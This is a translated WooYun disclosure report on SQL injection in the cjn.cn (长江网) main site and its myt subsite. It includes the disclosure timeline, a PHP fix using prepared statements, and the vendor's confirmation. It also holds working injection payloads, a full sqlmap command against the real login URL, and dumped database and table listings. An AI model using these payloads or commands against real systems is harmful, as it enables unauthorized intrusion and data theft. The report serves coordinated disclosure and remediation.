
Vulnerability summary

Defect ID: wooyun-2015-0162508

Title: SQL injection in the cjn.cn (长江网) main site and a subsite

Vendor: 长江网 (cjn.cn)

Author: Nelion

Submitted: 2015-12-18 18:37

Fixed: 2016-02-01 10:51

Published: 2016-02-01 10:51

Vulnerability type: SQL injection

Severity (self-assessed): Low

Self-assessed Rank: 1

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-18: Details sent to the vendor, awaiting vendor handling
2015-12-20: Vendor confirmed; details visible to the vendor only
2015-12-30: Details disclosed to core white hats and domain experts
2016-01-09: Details disclosed to regular white hats
2016-01-19: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public

Brief description:

SQL injection in the cjn.cn main site and a subsite; no login is required, and a large amount of data is exposed.

Detailed description:

cjn.cn (长江网, www.cjn.cn) is the official website of Changjiang Daily. Established by decision of the Wuhan municipal Party committee and government, declared by the Hubei Provincial Government Information Office and approved by the State Council Information Office, it is the only comprehensive news website in the Wuhan area and a key national local news site. It runs channels for news, video news, sports, entertainment, forums, blogs, real estate, cars and more, with authoritative content, fast updates and strong interactivity. Following its "news first" principle, it publishes public information for understanding, promoting and building Wuhan, serves as a direct reporting point for provincial and municipal online public opinion, was named one of Wuhan's ten best internet service demonstration enterprises for 2005, and has become an important front for Wuhan's external publicity.
1. Main site injection:
1) Main site injection point: http://www.cjn.cn/dyx/shownum.php?id=

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8792 OR 1003=1003#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (7261=7261) THEN SLEEP(5) ELSE 7261*(SELECT 7261 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: UNION query
Title: MySQL UNION query (random number) - 4 columns
Payload: id=-6174 UNION ALL SELECT 9355,9355,9355,CONCAT(0x7176706a71,0x6e516e47757148667548,0x71626b7671)#
---
[14:40:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12

Proof of vulnerability:

2) All databases on the main site:

available databases [51]:
[*] #mysql50#cjntj.bak
[*] #mysql50#cjnvote.bak
[*] #mysql50#phpwind.bak
[*] cc
[*] ccvms
[*] cjnphoto
[*] cjnvote
[*] collabtive
[*] dwz
[*] information_schema
[*] maps
[*] mingpai
[*] mysql
[*] myt
[*] newdata_user
[*] osfc
[*] phpstat_mysql_10_mysql
[*] phpstat_mysql_10_mysql_log
[*] phpstat_mysql_1_mysql
[*] phpstat_mysql_1_mysql_log
[*] phpstat_mysql_2_mysql
[*] phpstat_mysql_2_mysql_log
[*] phpstat_mysql_3_mysql
[*] phpstat_mysql_3_mysql_log
[*] phpstat_mysql_4_mysql
[*] phpstat_mysql_4_mysql_log
[*] phpstat_mysql_5_mysql
[*] phpstat_mysql_5_mysql_log
[*] phpstat_mysql_6_mysql
[*] phpstat_mysql_6_mysql_log
[*] phpstat_mysql_7_mysql
[*] phpstat_mysql_7_mysql_log
[*] phpstat_mysql_8_mysql
[*] phpstat_mysql_8_mysql_log
[*] phpstat_mysql_9_mysql
[*] phpstat_mysql_9_mysql_log
[*] phpstat_mysql_mysql
[*] phpstat_web
[*] phpwind
[*] phpwindcs
[*] test
[*] TriAquae
[*] tweibo
[*] veryvote
[*] vsftpduser
[*] wh4z
[*] whwx
[*] wordpress
[*] xweibo
[*] xweibo2x
[*] zhenhao


3) The main site's current database is veryvote; its tables and row counts:

Database: veryvote
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| votelogs | 828940 |
| xh_ip | 423311 |
| jdhyxlogs | 190262 |
| nwwhlogs | 87329 |
| d_vote | 42369 |
| photo_yml | 23530 |
| guestbook | 14458 |
| ajax_vote | 12020 |
| xfwhlogs | 10553 |
| photo_xfwh | 6563 |
| xh_question | 5907 |
| jdhyx_dzps | 4612 |
| dfnsvote_log | 3819 |
| photo_mzy | 3386 |
| jdhyx_card | 3000 |
| Bl_web | 2682 |
| Bl_web_reply | 2406 |
| photo_nwwh | 2379 |
| dfnsvote | 1867 |
| `100_photo` | 1677 |
| photo_lyzyz | 1499 |
| nhdrlogs | 1354 |
| xh_title | 1300 |
| wawj | 1178 |
| photo_whyr | 1085 |
| photo_lyxr | 898 |
| photo_29jhz | 828 |
| photo_xswh | 792 |
| photo_jdhyx | 716 |
| Bl_mobile_reply | 641 |
| photo_dfbt | 426 |
| photo_kqdnf | 424 |
| xh_subject | 398 |
| xh_userinfo | 226 |
| photo_cb | 221 |
| guestbook_1 | 139 |
| guestboard | 129 |
| photo_nhdr | 117 |
| `100_user` | 116 |
| photo_city | 107 |
| photo_dthl2012 | 93 |
| photo_glhd | 85 |
| jkzx | 70 |
| photo_ssdrpx | 60 |
| ratings | 60 |
| Bl_mobile | 55 |
| wybl | 53 |
| photo_wygl | 48 |
| `100_hu` | 38 |
| photo_wyjjy | 36 |
| photo_dthl | 29 |
| xh_config | 29 |
| photo_taxi | 28 |
| photo_tianshi | 23 |
| photo_mqj | 17 |
| photo_cjxn | 14 |
| photo_city_by | 8 |
| photo_wrw | 5 |
| inews_user | 4 |
| cjntg | 3 |
| sj_photo_list | 3 |
| keyword | 1 |
| photo_mgdx | 1 |
| sj_photo_xm | 1 |
+-----------------+---------+


4) Data in the tables:

(screenshot: 01主站表中数据库.png)


2. Subsite injection (POST):
1) myt subsite:

python sqlmap.py -u "http://myt.cjn.cn/user/pf_login.php" --data "password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634"


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=-6073' OR 1353=1353#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634' AND (SELECT * FROM (SELECT(SLEEP(5)))rlTt)#
---
[15:19:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12


2) myt subsite databases:
available databases [2]:
[*] information_schema
[*] myt

Fix:

Filter input parameters
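The fix advice above is a single phrase; the following added example (not cjn.cn's code) shows what it amounts to for the two injection points in this report: integer validation for the numeric `id` of shownum.php and a bound string parameter for the `username` of pf_login.php. The "before" query shapes and the table and column names (`counter`, `admin`, `pwd_hash`) are assumptions; the fixed code uses the mysqli API that already exists in PHP 5.2, the version the sqlmap banner reports.

```php
<?php
// Added example, not code from cjn.cn. The two "before" snippets are
// hypothetical reconstructions of the query shape implied by the sqlmap
// output above; table and column names are assumptions.
//
// BEFORE (shownum.php, hypothetical): the id is spliced into the SQL text.
//   $sql = "SELECT num FROM counter WHERE id=" . $_GET['id'];
//   id=-8792 OR 1003=1003#  ->  WHERE id=-8792 OR 1003=1003#  (always true)
//
// BEFORE (pf_login.php, hypothetical): quoted, but never escaped.
//   $sql = "SELECT pwd_hash FROM admin WHERE username='" . $_POST['username'] . "'";
//   username=-6073' OR 1353=1353#  ->  the quote is closed, the rest commented out
//
// AFTER: validate the type, then bind the value; the SQL text never changes.

$db = new mysqli('localhost', 'app_user', 'app_password', 'veryvote');
$db->set_charset('utf8');

// shownum.php: id must be a positive integer. FILTER_VALIDATE_INT returns
// false for "-8792 OR 1003=1003#", so the request is rejected before any SQL runs.
$id = filter_var(isset($_GET['id']) ? $_GET['id'] : '', FILTER_VALIDATE_INT);
if ($id === false || $id < 1) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid id');
}
$stmt = $db->prepare('SELECT num FROM counter WHERE id = ?');
$stmt->bind_param('i', $id);           // 'i' = integer placeholder
$stmt->execute();
$stmt->bind_result($num);
$stmt->fetch();
$stmt->close();

// pf_login.php: username is free text, so it is bound as a string. Whatever
// it contains ("'", "#", "OR ...", "SLEEP(5)") is data, never SQL.
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
$stmt = $db->prepare('SELECT pwd_hash FROM admin WHERE username = ? LIMIT 1');
$stmt->bind_param('s', $username);     // 's' = string placeholder
$stmt->execute();
$stmt->bind_result($pwdHash);
$loggedIn = false;
if ($stmt->fetch()) {
    // compare against the stored crypt()-format hash, not a plaintext column
    $loggedIn = (crypt($password, $pwdHash) === $pwdHash);
}
$stmt->close();
```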

Copyright notice: when reposting, credit the source: Nelion@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-20 11:49

Vendor reply:

Being handled, thank you

Latest status:

None yet